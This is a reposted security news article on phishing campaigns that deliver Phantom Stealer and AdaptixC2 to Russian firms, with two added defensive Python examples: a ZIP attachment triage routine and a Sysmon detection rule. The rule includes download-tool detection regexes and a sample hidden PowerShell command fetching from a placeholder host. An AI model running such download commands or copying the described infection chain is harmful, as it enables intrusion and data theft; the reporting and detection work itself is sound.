Phantom Stealer Spread by ISO Phishing Emails Hitting Russian Finance Sector

Posted on December 15, 2025 by CWS

Dec 15, 2025 | Ravie Lakshmanan | Malware / Cybercrime
Cybersecurity researchers have disclosed details of an active phishing campaign that is targeting a variety of sectors in Russia with phishing emails that deliver Phantom Stealer via malicious ISO optical disc images.
The activity, codenamed Operation MoneyMount-ISO by Seqrite Labs, has primarily singled out finance and accounting entities, with those in the procurement, legal, and payroll verticals emerging as secondary targets.
"This campaign employs a fake payment confirmation lure to deliver the Phantom information-stealing malware via a multi-stage attachment chain," the cybersecurity company said.

The infection chain begins with a phishing email that masquerades as legitimate financial communication, urging recipients to confirm a recent bank transfer. Attached to the email is a ZIP archive that claims to contain further details but instead contains an ISO file that, when launched, mounts on the system as a virtual CD drive.
The ISO image ("Подтверждение банковского перевода.iso" or "Bank transfer confirmation.iso") serves as an executable that is designed to launch Phantom Stealer through an embedded DLL ("CreativeAI.dll").
Phantom Stealer is capable of extracting data from cryptocurrency wallet browser extensions installed in Chromium-based browsers and from desktop wallet apps, as well as capturing files, Discord authentication tokens, and browser-stored passwords, cookies, and credit card details.
It also monitors clipboard content, logs keystrokes, and runs a series of checks to detect virtualized, sandboxed, or analysis environments, aborting its execution if any are found. Data exfiltration is achieved via a Telegram bot or an attacker-controlled Discord webhook. On top of that, the stealer supports file transfer to an FTP server.

In recent months, Russian organizations, primarily human resources and payroll departments, have also been targeted by phishing emails that use lures related to bonuses or internal financial policies to deploy a previously undocumented implant named DUPERUNNER, which loads AdaptixC2, an open-source command-and-control (C2) framework.
Dubbed DupeHike, the campaign has been attributed to a threat cluster named UNG0902.
"The ZIP has been used as an initial source of spear-phishing-based infection containing decoys with PDF and LNK extension, which downloads the implant DUPERUNNER, which finally executes the Adaptix C2 Beacon," Seqrite said.
The LNK file ("Документ_1_О_размере_годовой_премии.pdf.lnk" or "Document_1_On_the_amount_of_the_annual_bonus.pdf.lnk"), in turn, proceeds to download DUPERUNNER from an external server using "powershell.exe." The primary responsibility of the implant is to retrieve and display a decoy PDF and launch AdaptixC2 by injecting it into a legitimate Windows process such as "explorer.exe," "notepad.exe," or "msedge.exe."
Other phishing campaigns have taken aim at the finance, legal, and aerospace sectors in Russia to distribute Cobalt Strike and malicious tools like Formbook, DarkWatchman, and PhantomRemote, which are capable of data theft and hands-on-keyboard control. The email servers of compromised Russian companies are used to send the spear-phishing messages.
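Both chains above hinge on a ZIP attachment that hides a second container: an ISO image in Operation MoneyMount-ISO, and a shortcut wearing a decoy ".pdf.lnk" double extension in DupeHike. The following is an added example (not code from Seqrite Labs or The Hacker News) of a mail-gateway triage routine that opens the archive in memory and flags both patterns by file signature as well as by extension, so a disc image renamed to ".pdf" is still caught. The `triage_zip` function, the severity labels, and the sample archive (inert blobs carrying only the ISO 9660 and LNK header bytes, plus a harmless PDF stub) are constructed for this illustration; the member names are the ones quoted in the article.

```python
"""Triage an e-mail ZIP attachment for nested containers: an ISO image that
auto-mounts as a virtual drive, and a Windows shell link (LNK) with a decoy
double extension. Added example; file names, blobs and API are constructed."""
import io
import zipfile

# ISO 9660: the primary volume descriptor is in sector 16 (offset 0x8000)
# and its standard identifier "CD001" starts one byte in, at 0x8001.
ISO_MAGIC_OFFSET = 0x8001
ISO_MAGIC = b"CD001"
# Shell link header: HeaderSize 0x4C, then the LinkCLSID
# 00021401-0000-0000-C000-000000000046 in little-endian GUID layout.
LNK_MAGIC = bytes.fromhex("4C000000" "0114020000000000C000000000000046")

CONTAINER_EXTS = {".iso", ".img", ".vhd", ".vhdx"}   # mountable disc/disk images
DECOY_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx"}  # document types used as bait


def looks_like_iso9660(data: bytes) -> bool:
    """True if the bytes carry the ISO 9660 volume descriptor signature."""
    return data[ISO_MAGIC_OFFSET:ISO_MAGIC_OFFSET + len(ISO_MAGIC)] == ISO_MAGIC


def looks_like_lnk(data: bytes) -> bool:
    """True if the bytes start with the shell-link header."""
    return data.startswith(LNK_MAGIC)


def triage_zip(zip_bytes: bytes, max_member_bytes: int = 64 * 1024 * 1024) -> list[dict]:
    """Return one finding per suspicious archive member; empty list if clean."""
    findings: list[dict] = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            base = info.filename.rsplit("/", 1)[-1]
            parts = base.lower().split(".")
            ext = "." + parts[-1] if len(parts) > 1 else ""
            if info.file_size > max_member_bytes:
                # Don't decompress unbounded input; oversized members are still reported.
                findings.append({"file": base, "reason": "member too large to inspect",
                                 "severity": "medium"})
                continue
            data = zf.read(info)
            # Signature check first so a renamed image is caught regardless of extension.
            if looks_like_iso9660(data) or ext in CONTAINER_EXTS:
                findings.append({"file": base,
                                 "reason": "disc image inside archive (mounts as a virtual drive)",
                                 "severity": "high"})
            if looks_like_lnk(data) or ext == ".lnk":
                decoy = len(parts) > 2 and "." + parts[-2] in DECOY_EXTS
                findings.append({"file": base,
                                 "reason": ("shell link with decoy double extension" if decoy
                                            else "shell link inside archive"),
                                 "severity": "high" if decoy else "medium"})
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample archive: an inert ISO-shaped blob, an inert LNK-shaped
    blob, and a benign PDF stub. None of these contain executable content."""
    iso_blob = b"\x00" * ISO_MAGIC_OFFSET + ISO_MAGIC + b"\x00" * 2048
    lnk_blob = LNK_MAGIC + b"\x00" * 60
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Подтверждение банковского перевода.iso", iso_blob)
        zf.writestr("Документ_1_О_размере_годовой_премии.pdf.lnk", lnk_blob)
        zf.writestr("invoice.pdf", b"%PDF-1.4\n%%EOF\n")
    return buf.getvalue()


if __name__ == "__main__":
    for f in triage_zip(build_sample_zip()):
        print(f"[{f['severity']}] {f['file']}: {f['reason']}")
```

The content checks matter more than the extension lists: the ISO test reads the volume descriptor signature at offset 0x8001 and the LNK test reads the fixed header, so neither depends on what the sender named the file. The size cap keeps a decompression bomb from exhausting the gateway while still producing a finding for the oversized member.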
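On the endpoint, the DupeHike chain described above leaves two host-telemetry signals: a shortcut opened from Explorer spawns "powershell.exe" to download the implant, and the implant then injects into a Windows process that, in the case of "notepad.exe", never makes outbound connections on its own. The following is an added example (not Seqrite's or The Hacker News' code) of a small correlation rule over Sysmon-style events (Event ID 1 = process create, Event ID 3 = network connect); the field names, the `detect` function, and the event records, including the placeholder URL "example.invalid" standing in for the undisclosed download server, are constructed for this illustration.

```python
"""Flag (1) powershell.exe spawned by explorer.exe with a download command and
(2) outbound connections from a process that normally has none. Added
example; event shape and sample records are constructed."""
import re

DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer|\bcurl\b|\bwget\b",
    re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b|-enc\w*\s", re.I)
# explorer.exe and msedge.exe legitimately use the network, so a plain
# egress rule is only clean for notepad.exe among the article's targets.
SILENT_PROCESSES = {"notepad.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: list[dict]) -> list[dict]:
    """Return one alert per matching event; benign records yield nothing."""
    alerts: list[dict] = []
    for e in events:
        if e["event_id"] == 1 and _basename(e["image"]) == "powershell.exe" \
                and _basename(e["parent_image"]) == "explorer.exe":
            cmd = e["command_line"]
            if DOWNLOAD_RE.search(cmd):
                # Hidden-window / no-profile switches raise confidence: a user
                # typing at a console rarely needs them, a shortcut payload does.
                alerts.append({"rule": "explorer_spawns_powershell_download",
                               "pid": e["pid"],
                               "confidence": "high" if HIDDEN_RE.search(cmd) else "medium"})
        elif e["event_id"] == 3 and _basename(e["image"]) in SILENT_PROCESSES:
            alerts.append({"rule": "network_egress_from_silent_process",
                           "pid": e["pid"],
                           "confidence": "high"})
    return alerts


# Constructed Sysmon-like records (not real telemetry from the campaign).
SAMPLE_EVENTS = [
    {"event_id": 1, "pid": 5120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -NoProfile -Command Get-Date"},          # benign
    {"event_id": 1, "pid": 6012,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -WindowStyle Hidden -NoProfile -Command "
                     "Invoke-WebRequest -Uri http://example.invalid/bonus.pdf "
                     r"-OutFile $env:TEMP\bonus.pdf"},                          # LNK download stage
    {"event_id": 3, "pid": 7740,
     "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "dest_ip": "203.0.113.5", "dest_port": 443},                              # browser, expected
    {"event_id": 3, "pid": 8104,
     "image": r"C:\Windows\System32\notepad.exe",
     "dest_ip": "203.0.113.77", "dest_port": 443},                             # injected host process
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a['rule']} pid={a['pid']} confidence={a['confidence']}")
```

The second rule is deliberately narrow: it only names a process with no legitimate network use, because alerting on every connection from "explorer.exe" or "msedge.exe" would drown the signal. Covering those two injection targets needs richer telemetry (for example, CreateRemoteThread or unbacked-memory events) rather than a connection filter.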

French cybersecurity company Intrinsec has attributed the intrusion set targeting the Russian aerospace industry to hacktivists aligned with Ukrainian interests. The activity, detected between June and September 2025, shares overlaps with Hive0117, Operation CargoTalon, and Rainbow Hyena (aka Fairy Trickster, Head Mare, and PhantomCore).
Some of these efforts have also been found to redirect users to phishing login pages hosted on the InterPlanetary File System (IPFS) and Vercel, designed to steal credentials associated with Microsoft Outlook and Bureau 1440, a Russian aerospace company.
"The campaigns observed between June and September 2025 […] aimed at compromising entities actively cooperating with Russia's military amidst the current conflict with Ukraine, largely assessed by the Western sanctions imposed on them," Intrinsec said.

Source: The Hacker News
